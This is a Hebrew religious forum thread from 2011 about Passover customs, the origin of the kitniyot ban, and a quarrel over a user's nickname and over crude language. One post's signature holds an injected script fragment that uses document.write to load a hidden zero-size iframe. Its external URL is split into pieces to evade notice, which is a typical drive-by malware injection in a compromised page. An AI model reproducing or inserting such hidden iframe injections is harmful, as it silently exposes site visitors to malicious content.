בית פורומים עצור כאן חושבים

פסח - אל תיטוש וכל מה שקשור ...אשמח לשמוע קצת מן המקורות

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-13/3/2011 12:38 לינק ישיר 

להוסיף לתורה ?! זה דאורייתא שאסור,

תקנות יכולים רק חכמים להוסיף,
ואפי' לגבי תקנות חז"ל אסור לעשותו עיקר,
ועל זה כבר זעק ר' חייא "אל תוסף על דבריו פן יוכיח בך ונכזבת, תני ר' חייא שלא תעשה את הגדר יותר מן העיקר שלא יפול ויקצץ הנטיעות"

ואתה ידידי יכול בגלל וויכוח להגדיר חבר פורום כרשע ??? ועוד על הרב מיימוני היקר ???

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 13:17 לינק ישיר 

האם דברי כתובים יכולים להפוך להלכה?

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 14:08 לינק ישיר 

מיימוני-עצכח

1. שוב הפחד הילדותי שאמא תתפוס שאתה משתתף בפורום שמישהו כתב בו "איבר רבייה חיצוני" ותשלח אותך לשטוף את הפה במים וסבון?

2. שם הניק צרם לי, וזו הסיבה שעשיתי לו רדוקציה קריקטורית. צרם לי גם ה welcoming שלך שיצא כך: "שוביניסט, ברוך הבא אל הפורום!" האם על ניק כמו אנטישמי / שונא יהודים / נאצי היינו מקבלים את הפראזה "נאצי, ברוך הבא אל הפורום!"?. לא הייתה מזיקה איזושהי הערה / בקשה להחליף ניק. או שאת חוסר הנוחות הזה אמא שלך לא הטמיעה בך...

3. השארת שם "מעריץ את עצמו" וקשה להבין למי ההודעה מכוּוֶנֶת.

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 14:28 לינק ישיר 

פרזנט לא הבנתי 
יש לך בעיה עם בעיה עם השם שוביניסט ???

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 14:34 לינק ישיר 

כן

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 14:43 לינק ישיר 

מאיזה גיל אפשר לכתוב כאן?

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 16:15 לינק ישיר 

חבל שזה מגיע לפסים האלה 

הנושא הוא דווקא מעניין !!!!!

יש כאלה שפשוט סובלים בפסח כשהם בטוחים שמקיימים מצווה ..

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 18:56 לינק ישיר 

חורא גנב

א. אתה מסכים שאין חיוב (מהתורה, מדברי חכמים) לשמור על מנהגי המשפחה וזה רק דרישה מובנת מבחינה פסיכולוגית של האב?

ב. לא הבנתי מיהו הבן השני. הרשע? האם כוונתך אלי? מפני מה? אשמח אם תסביר כי ראיתי שמישהו כאן הבין שכוונתך למתוח עלי ביקורת ולא הבנתי מדוע.

הנוכח

בדקתי מהו שוביניזם וגיליתי שזה אכן דבר לא חיובי. הערך מויקיפידיה מועתק בסוף כנספח.

אך האם כל מי שמשתמש במילה מודע לכל משמעויותיה? אני למשל לא ידעתי עליהן, וסברתי שזה ביטוי גנאי למי שנחשב או מוצג כמזלזל בזכויות האשה. וסברתי שאין זו אלא בדיחה. עתה עמדתי על טעותי. כמדומה שהשוביניסט שלנו אף הוא לא ידע על כך ודבריו כאן הוכחה. 

ולו יצוייר שבחר ניק שמשמעותו פסולה, האם יש להעיר על כך בבדיחה? אני אמנם יודע שיש סבורים שבדיחה היא דרך טובה להעיר בלי לפגוע.

ולגבי הבדיחה שמחקתי אודות ***, אין לי בעיה עם אמא אלא עם מה שבעיני הינו ניסוח גס, סליחה על המילה "גס".כיון שחוקת הפורום היא כשיטתי (אני כתבתי אותה...) וכיון שהמחק בידי, מחקתי.

אולי ראוי לציין שמלבד זאת, אני ממעט למחוק...

מחקתי את ויקי על שוביניזם בגלל שהשורה היתה רחבה מדי וקילקלה את האשכול.

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 13/03/2011 18:58:11

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 19:23 לינק ישיר 

מיימוני
זו הבעיה.
שההגדרות שלך ל'גסות' תקועות בשלב ההוא.
בעולם הרחב, הרבה מההתנסחויות הבינאישיות בפורום הזה יוגדרו כגסות רוח מדרגה ראשונה. בעוד ש'השם המפורש' של תרכובות הפחמן המהוות את תוצרי הריאקציה של מערכת העיכול (גם זה גס מדיי? כי באמת הגזמת עם הבעייתיות שראית במושג 'איבר רבייה חיצוני') נחשבים לכל היותר למשהו שלא אומרים באמצע האוכל, או בהרצאה בינלאומית (כמו חיטוט באף, תקיעת שיהוק קולני ולבישת קפוצ'ון אדום עם ההדפס "I love NY").

כבר כתבתי לך פעם על כך יותר מפעם אחת ולא אחזור על זה ברביעית. אם אתה מתעקש להישאר במסגרת התפיסתית הזו - יערב ויבושם לך.

תוקן על ידי thepresent ב- 13/03/2011 19:47:54

דדווח על תוכן פוגעני

נשלח ב-13/3/2011 21:10 לינק ישיר 

הנוכח

תודה על התזכורת. (אמנם לא זכור לי שהערת לי, אבל הזכרון מתקלקל עם הגיל. יתכן גם שכתבת באיזה אשכול ולא זכיתי לראות).

תודה על התחשבותך להימנע מביטויים שאמא שלי היתה מגדירה כגסים.

אני מוכן שתכתוב את הביטוי "השם המפורש של תרכובות הפחמן וכו' ". זה ממש מצא חן בעיני בתור לשון נקיה ועוקפת גסות! אשתדל להשתמש במקבילותיו בשעת הצורך.

דדווח על תוכן פוגעני

נשלח ב-14/3/2011 12:21 לינק ישיר 

מיימוני מוצרים חדשים שאין בהם בעיה הלכתית לכאורה אין תוקף הלכתי לאוסרם. המסורת המשפחתית/קבוצתית עוזרת לא לחפש קולות אסורות ואח"כ לבוא ולשאול את האבא המיושן מה העבודה הזאת לכם. אם התפרשו דברי כאישיים, חלילה ומחילה, הלא רק דעות חולקים אנו כאן גם אם חלוקות.

דדווח על תוכן פוגעני

נשלח ב-14/3/2011 12:37 לינק ישיר 

ומעשה באחד אשר מחמת פיקוח נפש נאלץ לאכול לחם בפסח.
במוצאי החג הרים ידיו השמימה ונאנח: רבש"ע גלוי וידוע לפניך שלא להנאת גופי ח"ו עשיתי כן וכשם שקיבלו ישראל שכר על הפרישה אקבל אני שכר על הדרישה.
מודה אני לפניך שזכיתי לשמור הפסח בכל דקדוקיו. לא אכלתי ח"ו דגים, שומים,עגבניות, שרויה, קטניות וכל המאכלות האסורות בפסח, מלבד הלחם שמחלתי אנסתני לאכלו.
כאשר זכיתי לעשות פסח זה בכל משפטיו וחוקותיו כן אזכה לעשות עוד הרבה פסחים.
שמעתי מפי ת"ח א' שליט"א.

דדווח על תוכן פוגעני

נשלח ב-14/3/2011 12:55 לינק ישיר 

מישהו פה יודע אגב מה המקור של בעיית הקטניות ???

האם זה אותו בעיה של הקמח תפו''א

דמיחזי כקמח רגיל

הוא הדין לקטניות שאפשר לטעות בינהם לבין חיטה ???

דדווח על תוכן פוגעני

נשלח ב-14/3/2011 13:08 לינק ישיר 

כשהתחילו עם איסור הקטניות- אף אגב בתחילה- לא אסר אותן שום גורם מוסמך או פוסק- בכל מקרה תפוחי האדמה לא היו מוכרים באשכנז,
החיי אדם ניסה לאסור אותם מגזירת קטניות- אמרו לו כי -תפ"א בפסח זה חיי אדם.-
 ר' אברהם דנציגר-כתב כמה ספרים חיי אדם- נפש האדם -פני האדם, ועוד כמה- אבל אמרו עליו שלא היתה לו- יד אדם- והיה לו בן -פרא אדם- והוא בעצמו לא היה- בן אדם-

דדווח על תוכן פוגעני

נשלח ב-14/3/2011 15:12 לינק ישיר 

ובעניין גסויות, אני הייתי מחמיר אף יותר.
לא רק גסויות הקשורות למין יש לאסור כאן, אלא גם גסויות של עלבונות יחס מזלזל, יחס לגופו של אדם ולא לגופו של עניין וכדו'.
אני קורא בזאת למנהלי ואחראי הפורום לקחת עניין זה ברצינות, לנסח מחדש לאור הנסיון רב השנים בניהול הפורום, את תקנון הפורום, ולהסיר מהפורום הודעות, משפטים, או מילים שאינם עומדים בקריטריונים מחמירים (כן כן, מחמירים!) אלה.

אם רוצים להחזיר את הפורקום לרמה שהיתה בו, לא צריך לסגור אותו ולהפכו למורשים בלבד, יש לשמור על רמת ההתבטאות בו. (כי כידוע שדרך ארץ קדמה לתורה)
הפורום לא צריך להיות במה לשחרור לחצים נפשיים או רגשיים, והוא לא צריך להיות במה להשתלחויות שיטפחו על האגו של המשתלח.

תוקן על ידי שמניךטובים ב- 14/03/2011 15:15:27

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > פסח - אל תיטוש וכל מה שקשור ...אשמח לשמוע קצת מן המקורות
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 9 10 11 לדף הבא סך הכל 11 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.